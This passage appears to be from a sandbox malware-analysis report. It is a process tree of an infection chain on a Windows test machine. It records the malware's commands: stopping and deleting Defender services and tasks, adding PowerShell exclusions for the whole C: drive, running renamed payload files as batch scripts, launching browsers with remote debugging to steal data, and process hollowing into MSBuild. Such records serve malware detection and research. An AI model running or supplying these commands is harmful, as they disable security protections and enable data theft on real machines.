                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                      8⤵
                                        PID:2660
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdFilter"
                                        8⤵
                                        • Launches sc.exe
                                        PID:4056
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdFilter"
                                        8⤵
                                        • Launches sc.exe
                                        PID:2540
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                        8⤵
                                          PID:2044
                                        • C:\Windows\system32\sc.exe
                                          sc stop "SgrmAgent"
                                          8⤵
                                          • Launches sc.exe
                                          PID:3900
                                        • C:\Windows\system32\sc.exe
                                          sc delete "SgrmAgent"
                                          8⤵
                                          • Launches sc.exe
                                          PID:1724
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                          8⤵
                                            PID:1908
                                          • C:\Windows\system32\sc.exe
                                            sc stop "MsSecWfp"
                                            8⤵
                                            • Launches sc.exe
                                            PID:5736
                                          • C:\Windows\system32\sc.exe
                                            sc delete "MsSecWfp"
                                            8⤵
                                            • Launches sc.exe
                                            PID:3284
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                            8⤵
                                              PID:1052
                                            • C:\Windows\system32\sc.exe
                                              sc stop "MsSecFlt"
                                              8⤵
                                              • Launches sc.exe
                                              PID:5992
                                            • C:\Windows\system32\sc.exe
                                              sc delete "MsSecFlt"
                                              8⤵
                                              • Launches sc.exe
                                              PID:3192
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                              8⤵
                                                PID:5964
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecCore"
                                                8⤵
                                                • Launches sc.exe
                                                PID:3976
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecCore"
                                                8⤵
                                                • Launches sc.exe
                                                PID:2868
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                8⤵
                                                  PID:2480
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                  8⤵
                                                    PID:1712
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                    8⤵
                                                      PID:5156
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                      8⤵
                                                        PID:4016
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                        8⤵
                                                          PID:3616
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop ddrver
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:2472
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete ddrver
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:2828
                                              • C:\Users\Admin\AppData\Local\Temp\10427600101\amnew.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10427600101\amnew.exe"
                                                3⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • Drops file in Windows directory
                                                • System Location Discovery: System Language Discovery
                                                PID:2728
                                                • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                  4⤵
                                                  • Downloads MZ/PE file
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4404
                                                  • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:5152
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                      6⤵
                                                      • Downloads MZ/PE file
                                                      • System Location Discovery: System Language Discovery
                                                      • Checks processor information in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:3604
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                        7⤵
                                                        • Uses browser remote debugging
                                                        • Checks processor information in registry
                                                        • Enumerates system info in registry
                                                        • Modifies data under HKEY_USERS
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:5436
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb93ebdcf8,0x7ffb93ebdd04,0x7ffb93ebdd10
                                                          8⤵
                                                            PID:4640
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,16091714805416461392,10428350572848226428,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1984 /prefetch:2
                                                            8⤵
                                                              PID:5460
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2152,i,16091714805416461392,10428350572848226428,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2168 /prefetch:3
                                                              8⤵
                                                                PID:2456
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2392,i,16091714805416461392,10428350572848226428,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2572 /prefetch:8
                                                                8⤵
                                                                  PID:3184
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,16091714805416461392,10428350572848226428,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3296 /prefetch:1
                                                                  8⤵
                                                                  • Uses browser remote debugging
                                                                  PID:4740
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,16091714805416461392,10428350572848226428,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3336 /prefetch:1
                                                                  8⤵
                                                                  • Uses browser remote debugging
                                                                  PID:876
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4280,i,16091714805416461392,10428350572848226428,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4292 /prefetch:2
                                                                  8⤵
                                                                  • Uses browser remote debugging
                                                                  PID:4292
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4696,i,16091714805416461392,10428350572848226428,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4628 /prefetch:1
                                                                  8⤵
                                                                  • Uses browser remote debugging
                                                                  PID:4436
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4256,i,16091714805416461392,10428350572848226428,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5288 /prefetch:8
                                                                  8⤵
                                                                    PID:4220
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5472,i,16091714805416461392,10428350572848226428,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5252 /prefetch:8
                                                                    8⤵
                                                                      PID:5992
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5316,i,16091714805416461392,10428350572848226428,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5360 /prefetch:8
                                                                      8⤵
                                                                        PID:464
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5284,i,16091714805416461392,10428350572848226428,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5340 /prefetch:8
                                                                        8⤵
                                                                          PID:4564
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5336,i,16091714805416461392,10428350572848226428,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5328 /prefetch:8
                                                                          8⤵
                                                                            PID:960
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5480,i,16091714805416461392,10428350572848226428,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5880 /prefetch:8
                                                                            8⤵
                                                                              PID:4960
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                            7⤵
                                                                            • Uses browser remote debugging
                                                                            • Enumerates system info in registry
                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:2960
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x21c,0x264,0x7ffb93e9f208,0x7ffb93e9f214,0x7ffb93e9f220
                                                                              8⤵
                                                                                PID:368
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1940,i,8146985389325086144,9105163865269799764,262144 --variations-seed-version --mojo-platform-channel-handle=2096 /prefetch:3
                                                                                8⤵
                                                                                  PID:5488
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2052,i,8146985389325086144,9105163865269799764,262144 --variations-seed-version --mojo-platform-channel-handle=2044 /prefetch:2
                                                                                  8⤵
                                                                                    PID:2988
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2404,i,8146985389325086144,9105163865269799764,262144 --variations-seed-version --mojo-platform-channel-handle=2576 /prefetch:8
                                                                                    8⤵
                                                                                      PID:2244
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3512,i,8146985389325086144,9105163865269799764,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:1
                                                                                      8⤵
                                                                                      • Uses browser remote debugging
                                                                                      PID:5736
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3532,i,8146985389325086144,9105163865269799764,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
                                                                                      8⤵
                                                                                      • Uses browser remote debugging
                                                                                      PID:820
                                                                                  • C:\ProgramData\gdtrimy5xl.exe
                                                                                    "C:\ProgramData\gdtrimy5xl.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:10232
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      8⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:10292
                                                                                  • C:\ProgramData\89hl6xba1n.exe
                                                                                    "C:\ProgramData\89hl6xba1n.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:11404
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      8⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:11452
                                                                                      • C:\Users\Admin\AppData\Roaming\AK0gLlgjXX.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\AK0gLlgjXX.exe"
                                                                                        9⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Checks processor information in registry
                                                                                        PID:11708
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                          10⤵
                                                                                            PID:368
                                                                                        • C:\Users\Admin\AppData\Roaming\kgulJEA2hw.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\kgulJEA2hw.exe"
                                                                                          9⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6704
                                                                                    • C:\ProgramData\c2d26fuaas.exe
                                                                                      "C:\ProgramData\c2d26fuaas.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:12152
                                                                                      • C:\Users\Admin\AppData\Local\Temp\kxmsajF2\pMIlSw3AQJ5KcnGw.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\kxmsajF2\pMIlSw3AQJ5KcnGw.exe 0
                                                                                        8⤵
                                                                                        • Drops startup file
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:12220
                                                                                        • C:\Users\Admin\AppData\Local\Temp\kxmsajF2\YIlFX98H7RGjN7B1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\kxmsajF2\YIlFX98H7RGjN7B1.exe 12220
                                                                                          9⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5500
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 656
                                                                                            10⤵
                                                                                            • Program crash
                                                                                            PID:15904
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 12220 -s 1608
                                                                                          9⤵
                                                                                          • Program crash
                                                                                          PID:24132
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\euk6p" & exit
                                                                                      7⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:17672
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /t 11
                                                                                        8⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:17928
                                                                                • C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:1920
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                    6⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:4840
                                                                                • C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1648
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
                                                                                    6⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:2160
                                                                                  • C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
                                                                                    C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4664
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
                                                                                      7⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:6020
                                                                                • C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:4468
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                    6⤵
                                                                                      PID:2480
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      6⤵
                                                                                        PID:3104
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                        6⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:5028
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10046340101\e3be186656.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10046340101\e3be186656.exe"
                                                                                      5⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Windows directory
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:2856
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat
                                                                                        6⤵
                                                                                          PID:6904
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:5916
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                          6⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:7932
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10049560101\ac108001d1.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10049560101\ac108001d1.exe"
                                                                                        5⤵
                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                        • Checks BIOS information in registry
                                                                                        • Executes dropped EXE
                                                                                        • Identifies Wine through registry keys
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:6276
                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10049560101\ac108001d1.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:10944
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10049570101\c7d7860122.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10049570101\c7d7860122.exe"
                                                                                        5⤵
                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                        • Checks BIOS information in registry
                                                                                        • Executes dropped EXE
                                                                                        • Identifies Wine through registry keys
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:6584
                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10049570101\c7d7860122.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:23932
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10428320101\4WMUMmx.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10428320101\4WMUMmx.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:5952
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4948
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 1388
                                                                                        5⤵
                                                                                        • Program crash
                                                                                        PID:4588
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10428330101\TbV75ZR.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10428330101\TbV75ZR.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:3900
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:2620
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10428340101\dojG16n.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10428340101\dojG16n.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4332
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:5372
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10428350101\7IIl2eE.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10428350101\7IIl2eE.exe"
                                                                                    3⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in Windows directory
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2660
                                                                                    • C:\Windows\SysWOW64\CMD.exe
                                                                                      "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:4916
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10428360101\UZPt0hR.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10428360101\UZPt0hR.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:3120
                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                      4⤵
                                                                                        PID:1916
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:6112
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        "C:\Windows\system32\svchost.exe"
                                                                                        4⤵
                                                                                        • Downloads MZ/PE file
                                                                                        • Adds Run key to start application
                                                                                        PID:1692
                                                                                        • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                          "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5008
